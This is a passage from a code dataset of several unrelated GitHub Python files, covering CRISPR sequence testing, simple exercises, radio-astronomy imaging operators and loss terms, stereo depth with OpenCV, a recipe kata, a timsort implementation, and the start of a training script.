parser.parse_args()\n\n    FastaExtract(arguments)\n","repo_name":"duceppemo/CRISPR_Assay_Tester","sub_path":"crispr_tester.py","file_name":"crispr_tester.py","file_ext":"py","file_size_in_byte":22429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
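Because FastaExtract runs its whole pipeline from __init__, it can also be driven programmatically rather than through the CLI. A minimal sketch, assuming the class above is importable; the attribute names simply mirror the argparse definitions at the bottom of the file, and the file paths are hypothetical placeholders:

    from argparse import Namespace
    args = Namespace(alignment='mafft_alignment.fasta',
                     sequence='TTTNCCCCCAGCGCTTCAGCGTTC',
                     list=None, cutoff=0.001,
                     reference='reference.fasta',
                     output='./results', gap=False, mismatch=0.20)
    # FastaExtract(args)  # would run the full cross-reactivity + inclusivity pipeline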
+{"seq_id":"42943709766","text":"\ndef calculate(min, max, step):\n    sum = 0\n    for n in range(min, max+1, step):\n        sum = sum + n\n    print(sum)\n\ncalculate(1, 3, 1)\ncalculate(4,8,2)\ncalculate(-1,2,2) \n\ndef avg(data):\n    # Average salary of the non-manager employees in the given data\n    non_managers = [e for e in data[\"employees\"] if not e[\"manager\"]]\n    total = sum(e[\"salary\"] for e in non_managers)\n    print(total / len(non_managers))\n\navg({\n\"employees\":[ \n{\n\"name\":\"John\", \"salary\":30000, \"manager\":False\n}, \n{\n\"name\":\"Bob\", \"salary\":60000, \"manager\":True\n}, \n{ \n\"name\":\"Jenny\", \"salary\":50000, \"manager\":False\n}, \n{ \n\"name\":\"Tony\", \"salary\":40000, \"manager\":False\n} \n]\n})\n\ndef func(a):\n    def func2(b,c):\n        x = a + (b*c)\n        print(x)\n    return func2\n\nfunc(2)(3, 4)\nfunc(5)(1, -5)\nfunc(-3)(2, 9)\n\nimport sys\ndef maxProduct(nums):\n    if len(nums) < 2:\n        return\n    max_product = -sys.maxsize\n    max_i = max_j = -1\n    for i in range(len(nums)-1):\n        for j in range(i+1, len(nums)):\n            if max_product < nums[i] * nums[j]:\n                max_product = nums[i] * nums[j]\n                (max_i, max_j) = (i,j)\n    print(nums[max_i] * nums[max_j])\n\nmaxProduct([5, 20, 2, 6]) \nmaxProduct([10, -20, 0, 3]) \nmaxProduct([10, -20, 0, -3])\nmaxProduct([-1, 2])\nmaxProduct([-1, 0, 2]) \nmaxProduct([5,-1, -2, 0]) \nmaxProduct([-5, -2])\n \ndef twoSum(nums, target):\n    for i in range(len(nums)):\n        for j in range(i+1, len(nums)):\n            s = nums[i] + nums[j]\n            if s == target:\n                return [i, j]\n\nresult = twoSum([2, 11, 7, 15], 9)\nprint(result) \n\n","repo_name":"Reneeeeeeeeeeee/week2","sub_path":"week2.py","file_name":"week2.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71962282999","text":"\"\"\"\nLinearOperators [1,2] objects and containers used for optimization [3].\nOperators should implement the methods: `_matvec(self, x)` and `_rmatvec(self, x)`. See [1] for more information.\n\nNotes\n-----\nTo check the validity of an adjoint implementation with respect to the forward use: `pynoisy.operators.dottest`\n\nReferences\n----------\n[1] https://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.linalg.LinearOperator.html\n[2] https://pylops.readthedocs.io/en/latest/\n[3] https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.minimize.html\n\"\"\"\nimport numpy as _np\nimport xarray as _xr\nfrom scipy.sparse.linalg import LinearOperator as _LinearOperator\n\ndef dottest(Op, tol=1e-6, complexflag=0, raiseerror=True, verb=False):\n    \"\"\"Dot test.\n    Generate random vectors :math:`\\mathbf{u}` and :math:`\\mathbf{v}` and perform dot-test to verify the validity of\n    forward and adjoint operators. This test can help to detect errors in the operator implementation.\n    This function was taken from PyLops [1].\n\n    Parameters\n    ----------\n    Op : :obj:`pylops.LinearOperator`\n        Linear operator to test.\n    tol : :obj:`float`, optional\n        Dottest tolerance\n    complexflag : :obj:`bool`, optional\n        generate random vectors with real (0) or complex numbers\n        (1: only model, 2: only data, 3:both)\n    raiseerror : :obj:`bool`, optional\n        Raise error or simply return ``False`` when dottest fails\n    verb : :obj:`bool`, optional\n        Verbosity\n\n    Raises\n    ------\n    ValueError\n        If dot-test is not verified within chosen tolerance.\n\n    Notes\n    -----\n    A dot-test is a mathematical tool used in the development of numerical\n    linear operators.\n    More specifically, a correct implementation of forward and adjoint for\n    a linear operator should verify the following *equality*\n    within a numerical tolerance:\n    .. 
math::\n (\\mathbf{Op}*\\mathbf{u})^H*\\mathbf{v} =\n \\mathbf{u}^H*(\\mathbf{Op}^H*\\mathbf{v})\n\n References\n ----------\n [1] https://github.com/PyLops/pylops/blob/master/pylops/utils/dottest.py\n \"\"\"\n nr, nc = Op.shape\n\n if complexflag in (0, 2):\n u = _np.random.randn(nc)\n else:\n u = _np.random.randn(nc) + 1j*_np.random.randn(nc)\n\n if complexflag in (0, 1):\n v = _np.random.randn(nr)\n else:\n v = _np.random.randn(nr) + 1j*_np.random.randn(nr)\n\n y = Op.matvec(u) # Op * u\n x = Op.rmatvec(v) # Op'* v\n\n if complexflag == 0:\n yy = _np.dot(y, v) # (Op * u)' * v\n xx = _np.dot(u, x) # u' * (Op' * v)\n else:\n yy = _np.vdot(y, v) # (Op * u)' * v\n xx = _np.vdot(u, x) # u' * (Op' * v)\n\n # evaluate if dot test is passed\n if complexflag == 0:\n if _np.abs((yy - xx) / ((yy + xx + 1e-15) / 2)) < tol:\n if verb: print('Dot test passed, v^T(Opu)=%f - u^T(Op^Tv)=%f'\n % (yy, xx))\n return True\n else:\n if raiseerror:\n raise ValueError('Dot test failed, v^T(Opu)=%f - u^T(Op^Tv)=%f'\n % (yy, xx))\n if verb: print('Dot test failed, v^T(Opu)=%f - u^T(Op^Tv)=%f'\n % (yy, xx))\n return False\n else:\n checkreal = _np.abs((_np.real(yy) - _np.real(xx)) /\n ((_np.real(yy) + _np.real(xx)+1e-15) / 2)) < tol\n checkimag = _np.abs((_np.real(yy) - _np.real(xx)) /\n ((_np.real(yy) + _np.real(xx)+1e-15) / 2)) < tol\n if checkreal and checkimag:\n if verb:\n print('Dot test passed, v^T(Opu)=%f%+fi - u^T(Op^Tv)=%f%+fi'\n % (yy.real, yy.imag, xx.real, xx.imag))\n return True\n else:\n if raiseerror:\n raise ValueError('Dot test failed, v^H(Opu)=%f%+fi '\n '- u^H(Op^Hv)=%f%+fi'\n % (yy.real, yy.imag, xx.real, xx.imag))\n if verb:\n print('Dot test failed, v^H(Opu)=%f%+fi - u^H(Op^Hv)=%f%+fi'\n % (yy.real, yy.imag, xx.real, xx.imag))\n return False\n\nclass ModulateOp(_LinearOperator):\n \"\"\"\n Envelope modulation Operator in the form of scipy.sparse.linalg.LinearOperator object..\n output = modulation * envelope\n Parameters\n ----------\n modulation: xr.DataArray\n Modulation DaraArray with dimensions: ['t', 'y', 'x'].\n dtype: datatype, default=np.float64\n \"\"\"\n def __init__(self, modulation, dtype=_np.float64):\n self.modulation = modulation.data.reshape(modulation['t'].size, -1)\n\n # Shape and datatype\n nt, ny, nx = modulation['t'].size, modulation['y'].size, modulation['x'].size\n self._nt = nt\n self.shape = (nt * ny * nx, ny * nx)\n self.dtype = dtype\n\n def _matvec(self, x):\n output = (self.modulation * x).ravel()\n return output\n\n def _rmatvec(self, x):\n return _np.sum(_np.split(self.modulation.ravel() * x, self._nt), axis=0)\n\nclass ObserveOp(_LinearOperator):\n \"\"\"\n An EHT observation operator in the form of scipy.sparse.linalg.LinearOperator object.\n The forward call is equivalent to xarray.utils_observe.block_observe_same_nonoise().\n\n Parameters\n ----------\n obs: ehtim.Observation,\n ehtim Observation object.\n movie_coords: xr.Coordinates,\n The coordinates of the movie\n dtype: np.dtype, default=np.complex128,\n Datatype\n \"\"\"\n def __init__(self, obs, movie_coords, dtype=_np.complex128):\n\n if isinstance(movie_coords, _xr.core.coordinates.DataArrayCoordinates):\n movie_coords = movie_coords.to_dataset()\n movie_coords = movie_coords.utils_image.change_units('rad')\n movie_coords['t'].utils_movie.check_time_units(obs.timetype)\n\n import ehtim.observing.obs_helpers as _obsh\n\n # Forward coordinates\n obslist = obs.tlist()\n u_list = [obsdata['u'] for obsdata in obslist]\n v_list = [obsdata['v'] for obsdata in obslist]\n t_list = [obsdata[0]['time'] for 
obsdata in obslist]\n u, v = _np.concatenate(u_list), _np.concatenate(v_list)\n self._obstimes = t_list\n uv_per_t = _np.array([len(obsdata['v']) for obsdata in obslist])\n self._uvsplit = _np.cumsum(uv_per_t)[:-1]\n\n # Adjoint coordinates\n self._movie_coords = movie_coords.coords\n\n # Define forward operator as a sequence (list) of matrix operations\n A = []\n self._nx = movie_coords['x'].size\n self._ny = movie_coords['y'].size\n self._nt = movie_coords['t'].size\n psize = movie_coords.utils_image.psize\n for ui, vi in zip(u_list, v_list):\n A.append(_obsh.ftmatrix(psize, self._nx, self._ny, _np.vstack((ui, vi)).T))\n self._A = A\n\n # Weights for adjoint interpolation\n weights = _np.zeros((self._nt, len(t_list)))\n for i, t in enumerate(t_list):\n idx = _np.argmin(_np.abs(t - movie_coords['t'].data))\n point0 = movie_coords['t'].data[idx]\n if _np.allclose(t, point0):\n weights[idx, i] = 1.0\n else:\n pm = int(_np.sign(t - point0))\n if ((idx + pm >= movie_coords['t'].size) or (idx + pm < 0)):\n raise AttributeError('Observation time is out of bounds for movie duration')\n point1 = movie_coords['t'].data[idx + pm]\n interval = _np.abs(point0 - point1)\n assert (interval > 0), 'Interval should be g.t. 0'\n weights[idx, i] = 1.0 - _np.abs(point0 - t) / interval\n weights[idx + pm, i] = 1.0 - _np.abs(point1 - t) / interval\n\n self._weights = weights\n\n # Shape and datatype\n self.shape = (u.size, self._nt * self._ny * self._nx)\n self.dtype = dtype\n\n def _matvec(self, x):\n x = x.reshape(self._nt, self._nx, self._ny) if x.ndim != 3 else x\n if (not len(self._movie_coords['t']) == len(self._obstimes)) or not \\\n _np.allclose(self._movie_coords['t'], self._obstimes):\n x = _xr.DataArray(x, coords=self._movie_coords, dims=['t', 'y', 'x']).interp(\n t=self._obstimes, assume_sorted=True).values\n output = _np.concatenate([_np.matmul(At, xt.ravel()) for At, xt in zip(self._A, x)])\n return output\n\n def _rmatvec(self, x):\n x_list = _np.split(x, self._uvsplit)\n eht_H = _np.stack([_np.matmul(At.conj().T, xt) for At, xt in zip(self._A, x_list)])\n return _np.matmul(self._weights, eht_H).ravel()\n\nclass Loss(object):\n \"\"\"\n A Loss container which aggregates data-fit and regularization Operators.\n This container is meant to be used together with scipy.optimize.minimize(fun=loss, jac=loss.jac).\n\n Parameters\n ----------\n data_ops: pynoisy.operators.LossOperator or list of pynoisy.operators.LossOperator,\n Data-fit operators which implement: `__call__(self, x)` and `gradient(self, x)`.\n reg_ops: pynoisy.operators.LossOperator or list of pynoisy.operators.LossOperator, optional.\n Regularization operators which implement: `__call__(self, x)` and `gradient(self, x)`.\n \"\"\"\n def __init__(self, data_ops, reg_ops=None):\n self.data_ops = _np.atleast_1d(data_ops)\n self.reg_ops = _np.atleast_1d(reg_ops)\n\n def __call__(self, x):\n loss = _np.sum([data_op.w * data_op(x) for data_op in self.data_ops])\n for reg_op in self.reg_ops:\n if (reg_op is not None):\n loss += reg_op.w * reg_op(x)\n return loss\n\n def jac(self, x):\n grad = _np.sum([data_op.w * data_op.gradient(x) for data_op in self.data_ops], axis=0)\n for reg_op in self.reg_ops:\n if (reg_op is not None):\n grad += reg_op.w * reg_op.gradient(x)\n return grad.real.astype(_np.float64)\n\nclass LossOperator(object):\n \"\"\"\n A LossOperator container which is inherited by the specific loss implementation.\n LossOperators should implement the methods: `__call__(self, x)` and `gradient(self, x)`.\n\n Parameters\n ----------\n 
weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __init__(self, weight=1.0):\n self.w = weight\n\n def __call__(self, x):\n pass\n\n def gradient(self, x):\n pass\n\nclass L2LossOp(LossOperator):\n \"\"\"\n An l2 LossOperator implementing the computation and gradient of ||measurements - forwardOp(x)||^2\n\n Parameters\n ----------\n measurements: np.array,\n A 1D numpy array with measurement values.\n forwardOp: LinearOperator,\n A LinearOperator which implements: `_matvec(self, x)` and `_rmatvec(self, x)` (see [1])\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __init__(self, measurements, forwardOp, sigmas=None, weight=1.0):\n super().__init__(weight=weight)\n self.measurements = _np.array(measurements).ravel()\n self.sigmas = _np.ones_like(self.measurements) if sigmas is None else sigmas\n self.forwardOp = forwardOp\n\n def __call__(self, x):\n return _np.sum((_np.abs(self.measurements - self.forwardOp * x) / self.sigmas) ** 2)\n\n def gradient(self, x):\n return 2 * self.forwardOp.H * ( (self.forwardOp * x - self.measurements) / self.sigmas**2)\n\nclass L2RegOp(LossOperator):\n \"\"\"\n An l2 regularization LossOperator implementing the computation and gradient of ||x||^2\n\n Parameters\n ----------\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __call__(self, x):\n return _np.sum(_np.abs(x) ** 2)\n\n def gradient(self, x):\n return 2 * x\n\nclass MEMRegOp(LossOperator):\n \"\"\"\n Maximum Entropy Method regularization LossOperator.\n Entropy(x; prior) = sum( x * log( x/(prior + eps) ) )\n\n Parameters\n ----------\n prior: np.array,\n A 1D numpy array which represents the (raveled) prior vector.\n eps: float, default=1e-5,\n A regularization parameter to avoid division by zero.\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __init__(self, prior, eps=1e-5, weight=1.0):\n super().__init__(weight=weight)\n self.eps = eps\n self.prior = _np.array(prior).ravel()\n\n def __call__(self, x):\n return _np.sum(x * _np.log((x + self.eps) / (self.prior + self.eps)))\n\n def gradient(self, x):\n return _np.log((x + self.eps) / (self.prior + self.eps)) + 1\n\nclass FluxRegOp(LossOperator):\n \"\"\"\n Total flux regularization LossOperator.\n\n Parameters\n ----------\n prior: float,\n The prior on the total flux.\n weight: float, default=1.0,\n The weight of the operator in the total loss\n \"\"\"\n def __init__(self, prior, weight=1.0):\n super().__init__(weight=weight)\n self.prior = prior\n\n def __call__(self, x):\n return (_np.sum(x) - self.prior) ** 2\n\n def gradient(self, x):\n return 2 * (_np.sum(x) - self.prior) * _np.ones(len(x), dtype=_np.float64)\n\nclass STVRegOp(LossOperator):\n \"\"\"\n Squared Total Variation regularization LossOperator:\n STV[I(y,x)] = || \\nabla_x I(y,x)||**2 + || \\nabla_y I(y,x)||**2\n\n Parameters\n ----------\n ny, nx: int,\n Number of (y/x)-axis grid points.\n weight: float, default=1.0,\n The weight of the operator in the total loss\n\n Notes\n -----\n Requires PyLops library: https://pylops.readthedocs.io/\n \"\"\"\n def __init__(self, ny, nx, edge=False, kind='forward', weight=1.0):\n super().__init__(weight=weight)\n\n from pylops import FirstDerivative\n self.dyOp = FirstDerivative(nx*ny, dims=(ny, nx), dir=0, edge=edge, kind=kind)\n self.dxOp = FirstDerivative(nx*ny, dims=(ny, nx), dir=1, edge=edge, kind=kind)\n self.ny = ny\n self.nx = nx\n\n def __call__(self, x):\n return 
_np.sum((self.dxOp*x)**2 + (self.dyOp*x)**2)\n\n    def gradient(self, x):\n        \"\"\"\n        Compute the gradient of the TV regularization:\n            grad[STV(I)] = -2 * div( \\nabla(I) )\n\n        Notes\n        -----\n        The adjoint of the gradient is minus the divergent.\n        \"\"\"\n        return 2.0 * (self.dxOp.H * self.dxOp * x + self.dyOp.H * self.dyOp * x)\n\nclass TVRegOp(LossOperator):\n    \"\"\"\n    Total Variation regularization LossOperator:\n        TV[I(y,x)] = || \\nabla_x I(y,x)||_1 + || \\nabla_y I(y,x)||_1\n\n    Parameters\n    ----------\n    ny, nx: int,\n        Number of (y/x)-axis grid points.\n    weight: float, default=1.0,\n        The weight of the operator in the total loss\n\n    Notes\n    -----\n    Requires PyLops library: https://pylops.readthedocs.io/\n    \"\"\"\n    def __init__(self, ny, nx, edge=False, kind='forward', eps=1e-8, weight=1.0):\n        super().__init__(weight=weight)\n\n        from pylops import FirstDerivative\n        self.dyOp = FirstDerivative(nx*ny, dims=(ny, nx), dir=0, edge=edge, kind=kind)\n        self.dxOp = FirstDerivative(nx*ny, dims=(ny, nx), dir=1, edge=edge, kind=kind)\n        self.eps = eps\n        self.ny = ny\n        self.nx = nx\n\n    def __call__(self, x):\n        return _np.sum(_np.abs(self.dxOp*x) + _np.abs(self.dyOp*x))\n\n    def gradient(self, x):\n        \"\"\"\n        Compute the (epsilon regularized) gradient of the TV regularization:\n            grad[TV(I)] = -div( \\nabla(I) / sqrt( eps**2 + \\nabla(I)**2 ) )\n\n        Notes\n        -----\n        The adjoint of the gradient is minus the divergent.\n\n        References\n        ----------\n        https://mathematical-tours.github.io/book-sources/chapters-pdf/variational-priors.pdf\n        \"\"\"\n        gradx, grady = self.dxOp*x, self.dyOp*x\n        gradient = self.dxOp.H * ( gradx / _np.sqrt(self.eps**2 + _np.abs(gradx)**2)) + \\\n                   self.dyOp.H * ( grady / _np.sqrt(self.eps**2 + _np.abs(grady)**2))\n        return gradient\n\n    @staticmethod\n    def _softthreshold(x, thresh):\n        \"\"\"Soft thresholding.\n        Applies soft thresholding to vector ``x`` (equal to the proximity operator for\n        :math:`||\\mathbf{x}||_1`) as shown in [1].\n\n        Parameters\n        ----------\n        x : :obj:`numpy.ndarray`\n            Vector\n        thresh : :obj:`float`\n            Threshold\n\n        Returns\n        -------\n        x1 : :obj:`numpy.ndarray`\n            Thresholded vector\n\n        References\n        ----------\n        https://github.com/PyLops/pylops/blob/82b0f7dbc25ccdddc9bdab204d2f769d2ff4114f/pylops/optimization/sparsity.py#L53\n\n        .. [1] Chen, Y., Chen, K., Shi, P., Wang, Y., “Irregular seismic\n           data reconstruction using a percentile-half-thresholding algorithm”,\n           Journal of Geophysics and Engineering, vol. 11. 2014.\n        \"\"\"\n        if _np.iscomplexobj(x):\n            # https://stats.stackexchange.com/questions/357339/soft-thresholding-\n            # for-the-lasso-with-complex-valued-data\n            x1 = _np.maximum(_np.abs(x) - thresh, 0.) * _np.exp(1j * _np.angle(x))\n        else:\n            x1 = _np.maximum(_np.abs(x) - thresh, 0.) 
* _np.sign(x)\n return x1\n","repo_name":"aviadlevis/pynoisy","sub_path":"pynoisy/operators.py","file_name":"operators.py","file_ext":"py","file_size_in_byte":17182,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"74224802999","text":"import pycode_similar\nfrom pprint import pprint\n\ndef similarity_check(ref_code: str, actual_code: str):\n print(ref_code)\n print(actual_code)\n\n _, info = pycode_similar.detect([ref_code, actual_code],\n diff_method=pycode_similar.UnifiedDiff,\n keep_prints=False,\n module_level=False)[0]\n return info[0].plagiarism_percent\n\n# if __name__ == \"__main__\":\n# sample_code = \"\"\"class Solution:\n# def maxDepth(self, root: TreeNode) -> int:\n\n# if not root:\n# return 0\n\n# l = self.maxDepth(root.left)\n# r = self.maxDepth(root.right)\n\n# if l > r:\n# return l + 1\n# return r + 1\n# \"\"\"\n# sol_1_code = \"\"\"class Solution:\n# def maxDepth(self, root: TreeNode) -> int:\n# if not root:\n# return 0\n \n# depth = 0\n# q = []\n# q.append(root)\n \n# while q:\n# depth += 1\n# temp = []\n \n# for node in q:\n# if node.left:\n# temp.append(node.left)\n# if node.right:\n# temp.append(node.right)\n \n# q = temp\n \n# return depth\n# \"\"\"\n# pprint(similarity_check(sample_code, sol_1_code))","repo_name":"hidevscommunity/gen-ai-apps","sub_path":"PyEx/similarity_check.py","file_name":"similarity_check.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1463073023","text":"#################################################################\n###\n### Program to compute depth from stereo camera\n### Uses open cv\n###\n#################################################################\n\n\nimport numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport time\n\n\ncap1 = cv2.VideoCapture(0);\ncap2 = cv2.VideoCapture(1);\n# imgL = cv2.imread('images/l_94_3.png', cv2.IMREAD_GRAYSCALE)\n# imgR = cv2.imread('images/r_94_3.png', cv2.IMREAD_GRAYSCALE)\n\nfig=plt.figure()\nplt.ion()\nplt.show(block=False)\nwhile True:\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n ret, imgL = cap1.read()\n ret, imgR = cap2.read()\n\n # imgL = cv2.resize(imgL, (0,0), fx=0.8, fy=0.8)\n # imgR = cv2.resize(imgR, (0,0), fx=0.8, fy=0.8)\n\n imgL = cv2.cvtColor(imgL, cv2.COLOR_BGR2GRAY)\n imgR = cv2.cvtColor(imgR, cv2.COLOR_BGR2GRAY)\n\n ret,imgL = cv2.threshold(imgL, 127, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n ret,imgR = cv2.threshold(imgR, 127, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n\n\n window_size = 3\n min_disp = 16\n num_disp = 112-min_disp\n\n stereo = cv2.StereoSGBM(minDisparity = min_disp,\n numDisparities = num_disp,\n SADWindowSize = window_size,\n uniquenessRatio = 10,\n speckleWindowSize = 100,\n speckleRange = 32,\n disp12MaxDiff = 1,\n P1 = 8*3*window_size**2,\n P2 = 32*3*window_size**2,\n fullDP = False\n )\n\n # stereo = cv2.StereoSGBM(0, 32, 3, 128, 256, 20, 16, 1, 100, 20, True)\n disparity = stereo.compute(imgL,imgR)\n\n # plt.figure()\n plt.subplot(221), plt.imshow(imgL, 'gray')\n plt.subplot(222), plt.imshow(imgR, 'gray')\n plt.subplot(223), plt.imshow(disparity)\n plt.draw()\n\n\ncap2.release()\ncap1.release()\ncv2.destroyAllWindows()\n","repo_name":"hashir-n-a/mobware4u-python","sub_path":"ROBOT_DEPTH.py","file_name":"ROBOT_DEPTH.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 
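The stereo-depth entry above uses the OpenCV 2.x constructor cv2.StereoSGBM, which no longer exists in OpenCV 3/4. A rough sketch of the equivalent modern call, under the assumption that the same parameter values are wanted (blockSize replaces the old SADWindowSize argument):

    import cv2
    window_size = 3
    min_disp = 16
    num_disp = 112 - min_disp
    stereo = cv2.StereoSGBM_create(minDisparity=min_disp,
                                   numDisparities=num_disp,
                                   blockSize=window_size,
                                   uniquenessRatio=10,
                                   speckleWindowSize=100,
                                   speckleRange=32,
                                   disp12MaxDiff=1,
                                   P1=8 * 3 * window_size ** 2,
                                   P2=32 * 3 * window_size ** 2)
    # disparity = stereo.compute(imgL, imgR)  # imgL/imgR: rectified grayscale frames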
+{"seq_id":"8274707318","text":"\"\"\"\r\nTitle: Pete, the baker\r\nSource: https://www.codewars.com/kata/525c65e51bf619685c000059/python\r\nPete likes to bake some cakes. He has some recipes and ingredients. Unfortunately he is not good in maths. Can you help\r\n him to find out, how many cakes he could bake considering his recipes?\r\nWrite a function cakes(), which takes the recipe (object) and the available ingredients (also an object) and returns\r\n the maximum number of cakes Pete can bake (integer). For simplicity there are no units for the amounts\r\n (e.g. 1 lb of flour or 200 g of sugar are simply 1 or 200). Ingredients that are not present in the objects,\r\n can be considered as 0.\r\nExamples:\r\n# must return 2\r\ncakes({flour: 500, sugar: 200, eggs: 1}, {flour: 1200, sugar: 1200, eggs: 5, milk: 200})\r\n# must return 0\r\ncakes({apples: 3, flour: 300, sugar: 150, milk: 100, oil: 100}, {sugar: 500, flour: 2000, milk: 2000})\r\n\"\"\"\r\n\r\n\r\ndef cakes(recipe, available):\r\n\r\n listaDivInteira = []\r\n disponivel = {}\r\n\r\n if len(recipe) > len(available): \r\n return 0\r\n\r\n for k in recipe.keys(): \r\n if k not in available:\r\n return 0\r\n\r\n for k, v in available.items(): \r\n if k in recipe:\r\n disponivel[k] = v\r\n\r\n for k in disponivel.keys():\r\n listaDivInteira.append(disponivel[k] // recipe[k])\r\n return min(listaDivInteira)\r\n\r\n\r\n#MAIN\r\nprint(cakes({'sugar': 67, 'apples': 38, 'nuts': 32}, {'cream': 6080, 'chocolate': 9862, 'apples': 8870, 'crumbles': 6407, 'butter': 4885, 'milk': 2759, 'cocoa': 3718, 'pears': 2170, 'eggs': 4371, 'flour': 8459}))\r\n","repo_name":"SamMarckson/Python-Practice","sub_path":"Pete, the baker.py","file_name":"Pete, the baker.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35407887282","text":"\"\"\"Sort algorithm adapted from https://github.com/btrevizan/ordernsearch.git.\"\"\"\n\n\ndef def_key(x):\n \"\"\"Return the element to compare with.\n\n Keyword arguments:\n x -- object of any kind\n \"\"\"\n return x\n\n\ndef timsort(sequence, key=def_key):\n \"\"\"Tim sort implementation.\n\n Keyword arguments:\n sequence -- a 1darray to order\n key -- function that retrive a singular element\n (default is the element itself)\n \"\"\"\n n = len(sequence) # number of elements\n r = 16 # length of runs\n\n # For each run, sort with insertion\n for i in range(0, n, r):\n # Sort with insertion\n sequence[i:i + r] = insertion(sequence[i:i + r], key)\n\n # For each run, pairwise merge\n while r < n:\n for i in range(0, n - r, r * 2):\n left = i # left head's index\n right = i + r # right head's index\n\n # Divide sequences\n sequence1 = sequence[left:right]\n sequence2 = sequence[right:right + r]\n\n # Merge sequences\n sequence[left:right + r] = __simplemerge(sequence1, sequence2, key)\n\n r = r * 2\n\n return sequence\n\n\ndef insertion(sequence, key=def_key):\n \"\"\"Insertion sort with sequencial search.\n\n Keyword arguments:\n sequence -- a 1darray to order\n key -- function that retrive a singular element\n (default is the element itself)\n \"\"\"\n n = len(sequence) # number of elements\n\n # For each element...\n for i in range(1, n):\n value = sequence[i]\n\n # For each element already sorted...\n j = i - 1 # index of prev element\n while j >= 0:\n\n # Compare elements\n changed = key(value) < key(sequence[j])\n if not changed:\n break\n\n # Move the element forward by 1\n sequence[j + 1] = sequence[j]\n\n # 
+{"seq_id":"35407887282","text":"\"\"\"Sort algorithm adapted from https://github.com/btrevizan/ordernsearch.git.\"\"\"\n\n\ndef def_key(x):\n    \"\"\"Return the element to compare with.\n\n    Keyword arguments:\n        x -- object of any kind\n    \"\"\"\n    return x\n\n\ndef timsort(sequence, key=def_key):\n    \"\"\"Tim sort implementation.\n\n    Keyword arguments:\n        sequence -- a 1darray to order\n        key -- function that retrieves a singular element\n        (default is the element itself)\n    \"\"\"\n    n = len(sequence)           # number of elements\n    r = 16                      # length of runs\n\n    # For each run, sort with insertion\n    for i in range(0, n, r):\n        # Sort with insertion\n        sequence[i:i + r] = insertion(sequence[i:i + r], key)\n\n    # For each run, pairwise merge\n    while r < n:\n        for i in range(0, n - r, r * 2):\n            left = i                # left head's index\n            right = i + r           # right head's index\n\n            # Divide sequences\n            sequence1 = sequence[left:right]\n            sequence2 = sequence[right:right + r]\n\n            # Merge sequences\n            sequence[left:right + r] = __simplemerge(sequence1, sequence2, key)\n\n        r = r * 2\n\n    return sequence\n\n\ndef insertion(sequence, key=def_key):\n    \"\"\"Insertion sort with sequential search.\n\n    Keyword arguments:\n        sequence -- a 1darray to order\n        key -- function that retrieves a singular element\n        (default is the element itself)\n    \"\"\"\n    n = len(sequence)   # number of elements\n\n    # For each element...\n    for i in range(1, n):\n        value = sequence[i]\n\n        # For each element already sorted...\n        j = i - 1       # index of prev element\n        while j >= 0:\n\n            # Compare elements\n            changed = key(value) < key(sequence[j])\n            if not changed:\n                break\n\n            # Move the element forward by 1\n            sequence[j + 1] = sequence[j]\n\n            # Update j\n            j = j - 1\n\n        # Insert element after sequence[j]\n        sequence[j + 1] = value\n\n    return sequence\n\n\ndef __simplemerge(sequence1, sequence2, key=def_key):\n    \"\"\"Merge two sequences. The result is a sorted list.\n\n    Keyword arguments:\n        sequence1 -- sequence to be merged into the other\n        sequence2 -- other\n        key -- function that retrieves a singular element\n        (default is the element itself)\n    \"\"\"\n\n    n1 = len(sequence1)     # sequence's 1 length\n    n2 = len(sequence2)     # sequence's 2 length\n    l = 0                   # left's index\n    r = 0                   # right's index\n\n    # List with merged elements (sorted too)\n    merge = list()\n\n    # For each element on both sequences... (the for statement already advances i)\n    for i in range(n1 + n2):\n\n        left = sequence1[l]     # left element\n        right = sequence2[r]    # right element\n\n        # Compare elements\n        if key(left) < key(right):\n            merge.append(left)\n            l += 1\n        else:\n            merge.append(right)\n            r += 1\n\n        # End of left segment, concat right segment\n        if l == len(sequence1):\n            for j in range(r, len(sequence2)):\n                merge.append(sequence2[j])\n\n            break\n\n        # End of right segment, concat left segment\n        if r == len(sequence2):\n            for j in range(l, len(sequence1)):\n                merge.append(sequence1[j])\n\n            break\n\n    return merge\n","repo_name":"btrevizan/poa_expenses","sub_path":"src/pysort.py","file_name":"pysort.py","file_ext":"py","file_size_in_byte":3398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4119480372","text":"# Imports\nfrom __future__ import print_function\n\nimport os\nimport time\n\nimport dgl\nimport networkx as nx\nimport torch\nimport torchvision\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom tensorboardX import SummaryWriter\nfrom sklearn.model_selection import train_test_split\n\nimport ipdb\nimport h5py\nimport pickle\nimport argparse\nimport numpy as np\nfrom PIL import Image, ImageDraw, ImageFont\nimport random\nimport datetime\n\nimport utils.io as io\nfrom model.cnn_model import HOCNN\nfrom datasets import metadata\nfrom utils.vis_tool import vis_img\nfrom datasets.hico_constants import HicoConstants\nfrom datasets.hico_dataset import HicoDataset, collate_fn\n\nfrom optimizers import adabound\n\nimport json\nimport cv2\nfrom matplotlib import pyplot as plt\n\n#%matplotlib inline\n\n# Set random seed for reproducibility\ntorch.manual_seed(21)\nnp.random.seed(21)\n\n# Define data 